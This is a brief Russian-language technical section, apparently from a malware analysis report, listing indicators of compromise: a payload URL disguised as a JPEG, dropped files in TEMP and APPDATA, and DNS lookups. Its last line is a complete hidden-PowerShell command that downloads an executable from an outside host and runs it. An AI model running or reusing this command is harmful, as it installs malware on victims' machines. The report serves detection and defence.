Техническая информация
- https://g.top4top.io/p_16086kslq1.jpg как %temp%\idsvc.exe
- %TEMP%\idsvc.exe
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\run.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\catalog.dat
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK g.###4top.io
- DNS ASK microsoft.com
- DNS ASK el#####y369.linkpc.net
- '%TEMP%\idsvc.exe'
- '<SYSTEM32>\cmd.exe' /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://g.top4top.io/p_16086kslq1.jpg','%temp%\idsvc.exe');Start-Process '%temp%\idsvc.exe'